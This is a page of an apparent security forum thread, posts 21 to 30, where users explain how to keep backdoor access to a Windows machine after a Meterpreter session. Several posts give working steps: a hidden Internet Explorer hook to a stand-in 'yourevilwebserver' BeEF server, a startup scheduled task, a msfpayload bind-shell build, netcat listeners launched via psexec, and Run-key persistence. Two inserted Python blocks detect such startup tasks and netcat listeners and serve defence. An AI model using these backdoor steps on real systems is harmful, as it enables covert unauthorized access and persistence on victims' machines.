Page 3 of 5
Results 21 to 30 of 45

Thread: Opening backdoor after getting meterpreter session

  1. #21


    some notes:
    1. for backdoors use bind shells since they will open the port and just listen.
    2. you have to open the port in the local firewall if it is enabled
    3. if your target is behind a firewall it is useless to set a listening backdoor; only a call-home backdoor should be used, for example running a hidden iexplorer process connecting to a BeEF web server.
    4. you have to be hacking naked (directly connected to the Internet, not behind a NAT router or with the local firewall on)


    Did you check that local firewall was not running?
    netsh firewall show opmode

    I did not see any mention that you tried to install/enable Telnet or enable RDP on the target machine. What errors are you getting? You might not have the appropriate permissions on the target machine: when you do a getuid in meterpreter or whoami in a shell, are you running as SYSTEM or as a user? Also check if UAC is enabled by running in a shell reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA; if it is set to 1 then it is enabled, and unless you are running as SYSTEM you will not be able to disable it. Heck, if you are not SYSTEM and UAC is enabled you will not be able to punch a hole in the local firewall and a reverse shell will be needed.

  2. #22


    to make a BeEF backdoor first do the following. We create a VBScript that will launch a hidden iexplorer pointed to our BeEF server:
    Code:
    echo CreateObject("Wscript.Shell").Run "iexplore.exe -new http://yourevilwebserver/beef/hook/beefmagic.js.php", 0, False > c:\temp.vbs
    then we create a batch script that will call this VBScript:

    Code:
    echo wscript c:\temp.vbs > backdoor.cmd
    then schedule it for every time the target is rebooted:
    Code:
    schtasks /create /tn "SysCheckonStart" /tr c:\backdoor.cmd /sc onstart
    run the script just to make sure it works, in meterpreter:
    Code:
    execute -H -f cmd.exe -a "/c c:\backdoor.cmd"
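A defender-side check for the persistence mechanism described in this post: an added example (not from the thread or any of its posters) that parses constructed `schtasks /query /fo CSV /v` output and flags startup-triggered tasks that run a script host or a script file from outside the Windows and Program Files directories. The sample rows, task names and allow-listed directories are assumptions made for the example; the real command emits many more columns than the ones kept here.

```python
import csv
import io
import re

# Constructed sample of `schtasks /query /fo CSV /v` output (not real host data),
# trimmed to the columns the check uses. Column names match the real command.
SAMPLE_SCHTASKS_CSV = r'''"TaskName","Next Run Time","Status","Schedule Type","Task To Run","Run As User"
"\SysCheckonStart","N/A","Ready","At system start up","c:\backdoor.cmd","SYSTEM"
"\Microsoft\Windows\Defrag\ScheduledDefrag","N/A","Ready","Weekly","%windir%\system32\defrag.exe -c","SYSTEM"
"\Updater","N/A","Ready","At system start up","wscript c:\temp.vbs","Administrator"
"\Nightly backup","02:00:00","Ready","Daily","C:\Program Files\Backup\run.exe","SYSTEM"
'''

# Trigger types that fire without user interaction and so suit a persistence task.
STARTUP_TRIGGERS = {"at system start up", "at system startup", "at logon"}
# Script hosts and script extensions worth a second look when launched at boot.
SCRIPT_HOSTS = re.compile(r'\b(wscript|cscript|cmd|powershell|mshta|rundll32)(\.exe)?\b', re.I)
SCRIPT_EXT = re.compile(r'\.(vbs|cmd|bat|js|ps1|hta)\b', re.I)
# Assumed allow-list: binaries living under the OS or Program Files trees.
TRUSTED_DIRS = re.compile(r'^"?(%windir%|%systemroot%|c:\\windows|c:\\program files)', re.I)


def suspicious_startup_tasks(csv_text):
    """Return findings for boot/logon-triggered tasks that look like script-based persistence."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        # schtasks repeats the header line before each task on some Windows versions.
        if row["TaskName"] == "TaskName":
            continue
        if row["Schedule Type"].strip().lower() not in STARTUP_TRIGGERS:
            continue
        cmd = row["Task To Run"].strip()
        reasons = []
        if SCRIPT_HOSTS.search(cmd) or SCRIPT_EXT.search(cmd):
            reasons.append("script host or script file")
        if not TRUSTED_DIRS.match(cmd):
            reasons.append("binary outside Windows/Program Files")
        if reasons:
            findings.append({"task": row["TaskName"], "command": cmd,
                             "user": row["Run As User"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_startup_tasks(SAMPLE_SCHTASKS_CSV):
        print(f"{f['task']} -> {f['command']} (as {f['user']}): {', '.join(f['reasons'])}")
```

On a live host, feed the function the output of `schtasks /query /fo CSV /v` instead of the sample and review every hit against the change record for that machine.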

  3. #23


    Quote Originally Posted by Tr00g33k:
    portfwd in metasploit, actually forwards a port through router, firewall, etc. (it's meant to do this)? If I understand correctly?

    Tr00G33k
    it will port-forward any remote port to a local port through the Meterpreter channel, useful for when wanting to connect to the target's RDP or Telnet.
    good example:
    http://hkashfi.blogspot.com/2008/04/...with-port.html

  4. #24
    kazalku (Member, joined Feb 2009, 416 posts)


    Quote Originally Posted by BadKarmaPR:
    some notes:
    1. for backdoors use bind shells since they will open the port and just listen.
    2. you have to open the port in the local firewall if it is enabled
    3. if your target is behind a firewall it is useless to set a listening backdoor; only a call-home backdoor should be used, for example running a hidden iexplorer process connecting to a BeEF web server.
    4. you have to be hacking naked (directly connected to the Internet, not behind a NAT router or with the local firewall on)
    So, this should work well for the exe? After a few seconds of running, Vista shows that "listen.exe has stopped working........."
    Code:
    ./msfpayload windows/meterpreter/bind_tcp LPORT=10000 R | ./msfencode -c 2 -t exe -o listen.exe
    Long before, I disabled UAC & firewall of the Vista (victim) box.
    However, I have a router in between the BT3 box & the broadband modem. This enables my box to connect wirelessly. Should I connect directly to the modem by wire, or is that OK?

    Did you check that local firewall was not running?
    netsh firewall show opmode
    I didn't enable it for BT3 (unless it's up by default). "netsh" doesn't work for BT3, you know.

    I did not see any mention that you tried to install/enable Telnet or enable RDP on the target machine. What errors are you getting? You might not have the appropriate permissions on the target machine: when you do a getuid in meterpreter or whoami in a shell, are you running as SYSTEM or as a user? Also check if UAC is enabled by running in a shell reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA; if it is set to 1 then it is enabled, and unless you are running as SYSTEM you will not be able to disable it. Heck, if you are not SYSTEM and UAC is enabled you will not be able to punch a hole in the local firewall and a reverse shell will be needed.
    I'm running vista with administrative privilege...

    Edit:
    The exe file did open a port before stopped working. nmap scan result:
    10000/tcp open snet-sensor-mgmt

  5. #25


    netsh is a Windows command to configure network settings, not a Linux command. I would recommend that you first get a Netcat backdoor working since it is the simplest: nc -L -d -p <backdoor port of choice> -t -e cmd.exe

  6. #26
    imported_Deathray (Member, joined Oct 2007, 381 posts)


    Quote Originally Posted by kazalku:
    Edit:
    The exe file did open a port before stopped working. nmap scan result:
    That is normal. I tried once myself to use meterpreter as a backdoor - but whenever you scan the port with nmap the .exe crashes :S, pretty annoying.
    - Poul Wittig

  7. #27
    kazalku (Member, joined Feb 2009, 416 posts)


    Quote Originally Posted by BadKarmaPR:
    netsh is a Windows command to configure network settings, not a Linux command. I would recommend that you first get a Netcat backdoor working since it is the simplest: nc -L -d -p <backdoor port of choice> -t -e cmd.exe
    I did this in the first place. After getting the meterpreter session, I opened 2 backdoors in the Vista box for future invasion.

    Code:
    cd c:\
    mkdir xxx
    ls
    cd xxx
    upload /root/nc111nt/nc.exe nc.exe
    upload /root/PsTools/psexec.exe psexec.exe
    execute -f cmd.exe -c -H -i
    psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888
    psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 9999
    Then I ended the meterpreter session. Previously, I configured (port-forwarding) the victim's router to forward port 9999 requests to 192.168.1.2 (which is stationary for the Vista laptop). I know that this may not be possible in the real world.

    Now, from the BT3 box:
    Code:
    nc 82.24.180.15;) 9999 =======> works & gives the command shell
    nc 82.24.180.15;) 8888 =======> does not work
    I can easily understand why the 2nd command is not working, because we didn't ask the router to forward 8888 requests to the Vista box. And, as I mentioned earlier, in the real world I (or the attacker) wouldn't be able to configure the router. OR am I wrong? It's really tough to think that I can access another router without actually connecting to it (unless remote management is enabled by some dumb **s).

    Now, I tried a few other things:
    1) Tried "Back Orifice 2000 from SourceForge", but couldn't upload it because of the AV (Avast!, really good). So, I didn't go further. I'm sure that the AV will catch "Sub7" etc. as well.

    2) Saved the exe file in the Windows folder & edited the remote registry to run it every time the computer restarts. This one works but this is NOT a true backdoor. I will have to switch on my BT3 box first thing in the morning (before the other machine starts) & if I miss it then I will have to wait until the other one restarts.

    Any ideas, how to open a REAL backdoor? Thanks for your support.
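A defender-side counterpart to the two nc listeners set up in this post: an added example (not from the thread or any poster) that correlates constructed `netstat -ano` and `tasklist /fo CSV /nh` output to report listening TCP ports owned by netcat-style binaries, or listening on ports outside an expected-port allow-list. The sample PIDs, ports, image names, the foreign address and the expected-port set are assumptions made for the example.

```python
import csv
import io
import re

# Constructed sample of `netstat -ano` output (not real host data).
SAMPLE_NETSTAT = r'''
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1204
  TCP    0.0.0.0:8888           0.0.0.0:0              LISTENING       3312
  TCP    0.0.0.0:9999           0.0.0.0:0              LISTENING       3340
  TCP    192.168.1.2:9999       198.51.100.7:51002     ESTABLISHED     3340
'''
# Constructed sample of `tasklist /fo CSV /nh` output: image, PID, session name, session #, mem.
SAMPLE_TASKLIST = r'''"svchost.exe","880","Services","0","6,512 K"
"svchost.exe","1204","Services","0","5,020 K"
"nc.exe","3312","Console","1","1,944 K"
"nc.exe","3340","Console","1","1,960 K"
'''

# Only LISTENING TCP sockets matter for a bind-shell check; IPv6 "[::]:port" also matches.
NETSTAT_LISTEN = re.compile(r'^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$', re.M)
# Binaries that exist to hand a socket to a shell; any listener owned by one is a finding.
LISTENER_TOOLS = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe", "cryptcat.exe"}
# Assumed baseline of ports this (example) workstation is expected to listen on.
EXPECTED_PORTS = {135, 139, 445, 3389}


def pid_to_image(tasklist_csv):
    """Map PID -> lowercase image name from `tasklist /fo CSV /nh` output."""
    rows = csv.reader(io.StringIO(tasklist_csv))
    return {int(r[1]): r[0].lower() for r in rows if len(r) >= 2}


def unexpected_listeners(netstat_text, tasklist_csv, expected_ports=EXPECTED_PORTS):
    """Return (port, pid, image, reason) for each listener that breaks the baseline."""
    images = pid_to_image(tasklist_csv)
    findings = []
    for _addr, port, pid in NETSTAT_LISTEN.findall(netstat_text):
        port, pid = int(port), int(pid)
        image = images.get(pid, "<unknown>")
        if image in LISTENER_TOOLS:
            findings.append((port, pid, image, "known shell-listener binary"))
        elif port not in expected_ports:
            findings.append((port, pid, image, "port not in expected set"))
    return findings
```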

  8. #28


    netcat is a true backdoor; it has to be the most flexible tool there is. I would suggest cryptcat for pentests, but then again rarely in a pentest do the ROE let us place a backdoor, because we add risk to the client's environment. In most pentest shops you will find that they have a server in a colo or on an unfiltered connection to the Internet for the purpose of running servers that are always on for this type of attack; I do prefer some type of multi handler on the web that can act as a third person for attacks and shells. I would suggest learning how to use the sc command in Windows to launch a cmd.exe that will call another cmd.exe that runs nc, so it will not die when the first cmd.exe runs; also look at InGuardians' servifythis to make nc into a service and use sc to configure it so that it will always be on.

  9. #29
    hm2075 (Member, joined Feb 2010, 204 posts)


    what about the meterpreter exe / service?

    http://www.phreedom.org/software/metsvc/

    This is a network service wrapper for the Meterpreter. It can be used as a Windows service, or run as a command line application.

  10. #30


    Quote Originally Posted by hm2075:
    what about the meterpreter exe / service?

    http://www.phreedom.org/software/metsvc/

    This is a network service wrapper for the Meterpreter. It can be used as a Windows service, or run as a command line application.
    niceeeeeeee!!! never seen this one before, it is along the lines of using the inguardians tool and sc but in less steps.

